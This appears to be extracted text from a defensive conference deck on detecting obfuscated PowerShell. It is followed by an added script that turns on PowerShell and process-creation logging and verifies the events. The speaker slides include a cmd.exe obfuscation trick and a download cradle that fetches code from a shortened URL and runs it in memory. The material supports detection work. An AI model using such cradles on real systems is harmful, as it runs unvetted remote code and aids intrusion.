藏经阁-Revoke-Obfuscation.pdf
155-page PDF (uploaded 2023-09-09)
Revoke-Obfuscation
> PowerShell Obfuscation Detection Using Science
Daniel Bohannon - @danielhbohannon
Lee Holmes - @Lee_Holmes
> Whois
- MANDIANT Senior Applied Security Researcher
- Invoke-Obfuscation, Invoke-CradleCrafter
- Obfuscation, evasion and detection techniques
- @danielhbohannon
%ProgramData:~0,1%%ProgramData:~9,2% /c echo OBFUSCATION_FTW!
(cmd.exe substring expansion: on a default install %ProgramData% is C:\ProgramData, so ~0,1 yields "C" and ~9,2 yields "mD"; the line runs CmD /c echo ... without the string "cmd" ever appearing literally)
> Whois
- Lead security architect of Azure Management @ MS
- Author of the Windows PowerShell Cookbook
- Original member of PowerShell Development Team
- @Lee_Holmes
iex (iwr bit.ly/e0Mw9w)
(a one-line download cradle: Invoke-WebRequest fetches the remote content and Invoke-Expression executes it in memory)
Preparing Your Environment for Investigations
• Logs (and retention) are your friend: 1) enable 2) centralize 3) LOOK/MONITOR
• Process Auditing AND Command Line Process Auditing (Security Event ID 4688 with the command line included) FTW!
  • https://technet.microsoft.com/en-us/library/dn535776.aspx
  • SysInternals' Sysmon is also a solid option
• Real-time Process Monitoring
  • Uproot IDS - https://github.com/Invoke-IR/Uproot
• PowerShell Module, ScriptBlock, and Transcription logging
  • https://blogs.msdn.microsoft.com/powershell/2015/06/09/powershell-the-blue-team/
  • https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
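The slide lists what to turn on but not how. The following is an added example, not code from the Revoke-Obfuscation slides or from the speakers: it sets the documented Group Policy registry values for PowerShell module, script block and transcription logging, enables Process Creation auditing with the command line included in 4688, then launches a probe PowerShell process and pulls the matching 4688 and 4104 events back out so you can confirm the pipeline works before an incident. The transcript directory and the probe string are assumptions chosen for the demo; a domain GPO will override the local values.

```powershell
# Added example (not from the Revoke-Obfuscation slides). Run from an elevated
# Windows PowerShell 5.1 session on a test host.
#Requires -RunAsAdministrator

$PolicyRoot    = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
$TranscriptDir = 'C:\PSTranscripts'   # assumption: any directory the host can write to

function Set-PolicyValue {
    # Create the key if missing and write (or overwrite) one value.
    param([string]$Path, [string]$Name, $Value, [string]$Type = 'DWord')
    if (-not (Test-Path $Path)) { New-Item -Path $Path -Force | Out-Null }
    New-ItemProperty -Path $Path -Name $Name -Value $Value -PropertyType $Type -Force | Out-Null
}

# 1) Module logging for every module ("*" wildcard) -> event 4103 per pipeline execution.
Set-PolicyValue "$PolicyRoot\ModuleLogging"             'EnableModuleLogging' 1
Set-PolicyValue "$PolicyRoot\ModuleLogging\ModuleNames" '*' '*' 'String'

# 2) Script block logging -> event 4104 carries the code the engine actually compiled,
#    i.e. the de-obfuscated form even when the launcher was encoded or obfuscated.
Set-PolicyValue "$PolicyRoot\ScriptBlockLogging" 'EnableScriptBlockLogging' 1

# 3) Transcription with invocation headers (a timestamp for every command).
Set-PolicyValue "$PolicyRoot\Transcription" 'EnableTranscripting'    1
Set-PolicyValue "$PolicyRoot\Transcription" 'EnableInvocationHeader' 1
Set-PolicyValue "$PolicyRoot\Transcription" 'OutputDirectory' $TranscriptDir 'String'

# 4) Process creation auditing (Security 4688) plus the command line in each event.
auditpol.exe /set /subcategory:"Process Creation" /success:enable /failure:enable | Out-Null
Set-PolicyValue 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit' `
    'ProcessCreationIncludeCmdLine_Enabled' 1

# 5) Generate a test event in a fresh process (new policy applies to new PowerShell
#    processes) and prove that both logs caught it. Single quotes survive the child's
#    command-line parsing; double quotes would be stripped.
$probe = "Write-Output ('OBFUS' + 'CATION_FTW')"   # assumption: harmless marker string
Start-Process powershell.exe -ArgumentList "-NoProfile -Command $probe" -Wait -WindowStyle Hidden

$since = (Get-Date).AddMinutes(-5)

# Security 4688: Properties[8] is the CommandLine field.
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688; StartTime = $since } |
    Where-Object { $_.Properties[8].Value -like '*CATION_FTW*' } |
    ForEach-Object { "4688  $($_.TimeCreated)  $($_.Properties[8].Value)" }

# PowerShell Operational 4104: Properties[2] is the ScriptBlockText field.
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104; StartTime = $since } |
    Where-Object { $_.Properties[2].Value -like '*CATION_FTW*' } |
    ForEach-Object { "4104  $($_.TimeCreated)  $($_.Properties[2].Value)" }
```

Two practitioner caveats. Module logging with the "*" wildcard is verbose; size the event log (or forward it) before enabling it fleet-wide. Transcripts are plain text that an attacker with the user's privileges can edit or delete, so point OutputDirectory at a write-only network share rather than a local folder, which is the pattern the "PowerShell the Blue Team" post linked above recommends.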